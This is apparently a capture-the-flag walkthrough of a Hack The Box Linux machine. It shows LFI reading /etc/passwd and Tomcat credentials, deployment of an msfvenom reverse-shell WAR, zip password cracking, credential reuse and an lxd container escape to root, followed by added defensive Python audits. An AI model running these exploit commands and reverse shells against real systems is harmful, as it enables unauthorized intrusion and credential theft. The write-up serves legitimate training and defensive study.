Enumeration
export ip=10.10.10.194
ping $ip # ttl 63
nmap -sC -sV $ip -p-
| Port | Service | Notes |
|---|---|---|
| 22 | ssh | OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |
| 80 | http | Apache httpd 2.4.41 ((Ubuntu)) |
| 8080 | http | Apache Tomcat |

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP
Investigating the port 80 http service shows a couple of interesting pieces of info from the root page:
sales@megahosting.com
http://megahosting.htb/news.php?file=statement
Adding the hostname to the local dns resolver:
echo "address=/megahosting.htb/$ip" | sudo tee /etc/NetworkManager/dnsmasq.d/domains.conf
sudo systemctl restart NetworkManager
Additionally, checking http://10.10.10.194:8080/ shows a default Apache Tomcat installation with the manager running. Trying to log into the manager with a few test credentials or the defaults doesn't work, but the error page shows a couple of interesting file paths:
/etc/tomcat9/tomcat-users.xml
/usr/share/tomcat9
/var/lib/tomcat9/webapps/ROOT/index.html
Checking the docs links shows that this is Version 9.0.31.
LFI
Testing the file parameter for Local File Inclusion finds that the passwd file can be retrieved:
http://megahosting.htb/news.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
Checking for the Tomcat tomcat-users.xml in the locations indicated doesn't have much success. Checking the packaging format in the Debian archive at https://packages.debian.org/bullseye/all/tomcat9/filelist shows that the installation directory has an etc directory, giving /usr/share/tomcat9/etc/tomcat-users.xml. Checking for this file via the LFI:
curl -v http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
retrieves:
* Trying 10.10.10.194:80...
* Connected to megahosting.htb (10.10.10.194) port 80 (#0)
> GET /news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
> Host: megahosting.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 23 Jul 2023 17:25:35 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 2325
< Content-Type: text/html; charset=UTF-8
<
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
* Connection #0 to host megahosting.htb left intact
which gives the credentials tomcat and $3cureP4s5w0rd123!. These work to log into the Tomcat manager.
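As an added defensive example (not part of the original writeup), the following Python scans Apache access-log lines for the traversal pattern used above: ../ sequences or sensitive file paths inside a query parameter, including percent-encoded and double-encoded variants. The log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log line: client, ident, user, [time], "request", status, bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Files typically pulled through an inclusion bug; /etc/passwd and
# tomcat-users.xml are the two retrieved on this box.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "tomcat-users.xml")

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding ('%252e%252e%2f' -> '../') and fold '\\' to '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def classify(target):
    """Return why the request target looks like an LFI attempt, or None."""
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            val = decode_fully(raw)
            if "../" in val:
                return f"traversal in parameter {name!r}: {val}"
            if any(s in val for s in SENSITIVE):
                return f"sensitive path in parameter {name!r}: {val}"
    return None

def scan(lines):
    """Return (ip, status, reason) per suspicious line; a 200 with a
    realistic byte count is the strongest sign the include succeeded."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reason := classify(m.group("target"))):
            hits.append((m.group("ip"), int(m.group("status")), reason))
    return hits

# Constructed sample lines modelled on the requests made above.
SAMPLE_LOG = [
    '10.10.14.11 - - [23/Jul/2023:17:20:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1234',
    '10.10.14.11 - - [23/Jul/2023:17:21:09 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2325',
    '10.10.14.11 - - [23/Jul/2023:17:25:35 +0000] "GET /news.php?file=..%2f..%2f..%2f..%2fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2325',
    '10.10.14.12 - - [23/Jul/2023:17:26:00 +0000] "GET /index.php HTTP/1.1" 200 512',
]
```

Against a real server, pass the open log file to `scan()` and review any hit that returned 200 with a body size matching the targeted file.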
Tomcat Manager
Using these credentials, fuzzing the manager shows a /text endpoint. According to the documentation this supports deploying WAR files.
Testing the endpoint:
curl -u tomcat:'$3cureP4s5w0rd123!' http://$ip:8080/manager/text/list
shows valid results. Using the add and start endpoints it's possible to craft a malicious WAR containing a reverse shell and deploy it.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f war -o revshell.war
# listener
nc -lvnp 4444
# deploy
curl -u tomcat:'$3cureP4s5w0rd123!' -T revshell.war "http://$ip:8080/manager/text/deploy?path=/revshell&update=true"
# trigger the deployed payload
curl http://$ip:8080/revshell/
# shell connected
whoami # tomcat
id -a # 997:997
# shell stabilisation
python3 -c 'import pty; pty.spawn("/bin/bash")'
# (inside the nc session) CTRL+Z;
stty -a
stty raw -echo; fg;
ls; export SHELL=/bin/bash; export TERM=screen; stty rows 32 columns 100; reset;
This gets to a low-privileged shell.
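The deployment above only works because a single account holds manager-script and has its password stored in clear text. As an added defensive example (not part of the original writeup), this Python audits a tomcat-users.xml for those two conditions; the sample XML is constructed to mirror the structure of the leaked file, and the "digested credentials look like salt$iterations$hash" check is a heuristic.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://tomcat.apache.org/xml"}
# manager-script/manager-gui allow WAR deployment, i.e. code execution as the
# tomcat user; admin-* manage hosts. None of them belong on a shared account.
PRIVILEGED_ROLES = {"manager-script", "manager-gui", "manager-jmx", "admin-gui", "admin-script"}

def parse_users(xml_text):
    """Return {username: (password, roles)}; commented-out sample users are
    ignored by the parser exactly as Tomcat ignores them."""
    root = ET.fromstring(xml_text)
    users = {}
    # Tomcat 9 files carry the default namespace; older files have none.
    for tag in ("t:user", "user"):
        for u in root.findall(tag, NS):
            roles = {r.strip() for r in u.get("roles", "").split(",") if r.strip()}
            users[u.get("username")] = (u.get("password", ""), roles)
    return users

def audit(xml_text):
    """Return (username, issue) pairs a reviewer should act on."""
    issues = []
    for name, (password, roles) in parse_users(xml_text).items():
        priv = sorted(roles & PRIVILEGED_ROLES)
        if priv:
            issues.append((name, "privileged roles: " + ", ".join(priv)))
        # Heuristic: credentials written by Tomcat's digest tool look like
        # "salt$iterations$hash"; anything else is treated as stored in plaintext.
        if password and password.count("$") < 2:
            issues.append((name, "plaintext password"))
    return issues

# Constructed sample mirroring the structure of the file leaked above.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <!-- <user username="tomcat" password="must-be-changed" roles="tomcat"/> -->
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
  <user username="reader" password="c4f3$1000$9a1b2c3d" roles="probe"/>
</tomcat-users>
"""
```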
Horizontal Privilege Escalation via unsafe reused credential
Grabbing linpeas for enumeration
python -m http.server
# victim
wget http://10.10.14.11:8000/linpeas.sh
sh linpeas.sh > o
less -r o
Checking the web folder
ll /var/www/html
ll /var/www/html/files/
The file 16162020_backup.zip looks interesting.
cp /var/www/html/files/16162020_backup.zip /tmp
unzip /tmp/16162020_backup.zip # password protected; $3cureP4s5w0rd123! does not work
python3 -m http.server
# local pc
wget http://$ip:8000/16162020_backup.zip
fcrackzip -v -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
# admin@it
unzip 16162020_backup.zip # admin@it
Nothing jumps out as interesting in the zip, but it's another password. Trying this for user ash on the reverse shell:
su ash # admin@it
cat ~/user.txt
LXC Mount Manipulation for Vertical Privilege Escalation
id -a
# uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
lxc image list
/snap/bin/lxc image list
# no images
Containers can sometimes be used to mount the host rootfs, bypassing the need to get root on the host, since a privileged container runs as root. An lxc image is needed. An Alpine image will be the smallest and easiest to get onto the victim, since it can't reach the internet to download one automatically.
# kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
python -m http.server
# victim
wget http://10.10.14.11:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
The PATH on the victim needs fixing so that the snap binaries are found; it looks like it has a typo:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Now set up the lxc container:
lxd init
# no for all but make a new storage pool
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias alpine
lxc init alpine mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
cd /mnt/root
ls
cat root/root.txt
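The whole escalation rests on ash holding group 116(lxd), so the defensive check is an audit of who sits in container-admin groups. As an added example (not part of the original writeup), this Python flags interactive accounts that are members of lxd, lxc or docker, by supplementary or primary group; the ash and lxd passwd lines are taken from the dump above, the group lines are constructed.

```python
# Groups whose members can create privileged containers and mount the host
# filesystem, as done with lxd above: membership is effectively root on the host.
CONTAINER_ADMIN_GROUPS = {"lxd", "lxc", "docker"}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

def parse_passwd(text):
    """Map username -> (uid, gid, shell) from /etc/passwd content."""
    users = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
            users[name] = (int(uid), int(gid), shell)
    return users

def parse_group(text):
    """Map groupname -> (gid, supplementary members) from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, gid, members = line.split(":", 3)
            groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups

def audit(passwd_text, group_text):
    """Return sorted (user, group) pairs for accounts with a login shell that
    hold a container-admin group, via supplementary or primary membership."""
    users = parse_passwd(passwd_text)
    findings = set()
    for gname, (gid, members) in parse_group(group_text).items():
        if gname not in CONTAINER_ADMIN_GROUPS:
            continue
        primary = {u for u, (_uid, ugid, _sh) in users.items() if ugid == gid}
        for member in members | primary:
            shell = users.get(member, (None, None, None))[2]
            if shell and shell not in NOLOGIN_SHELLS:
                findings.add((member, gname))
    return sorted(findings)

# Constructed sample: the ash and lxd lines match the passwd dump above; the
# lxd group line mirrors the id output (116(lxd)). tomcat has no login shell.
PASSWD = """root:x:0:0:root:/root:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
"""
GROUP = """adm:x:4:syslog,ash
lxd:x:116:ash,tomcat
docker:x:117:
"""
```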